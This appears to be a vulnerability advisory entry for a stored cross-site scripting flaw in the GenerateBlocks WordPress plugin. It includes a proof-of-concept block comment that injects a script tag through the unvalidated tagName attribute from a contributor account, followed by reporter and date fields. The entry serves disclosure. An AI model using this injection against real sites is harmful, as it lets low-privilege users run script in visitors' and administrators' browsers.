The plugin does not validate the generateblocks/container block's tagName attribute, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.
Add the following code in a post/page while in code editor mode with an Contributor account: <!-- wp:generateblocks/container {"uniqueId":"98c07d5a","tagName":"script src=data:application/javascript,alert(/XSS/)","isDynamic":true} /--> Then view/preview the page/post to trigger the XSS
apple502j
apple502j
Yes
2021-11-01 (about 6 months ago)
2021-11-01 (about 6 months ago)
2022-04-09 (about 1 months ago)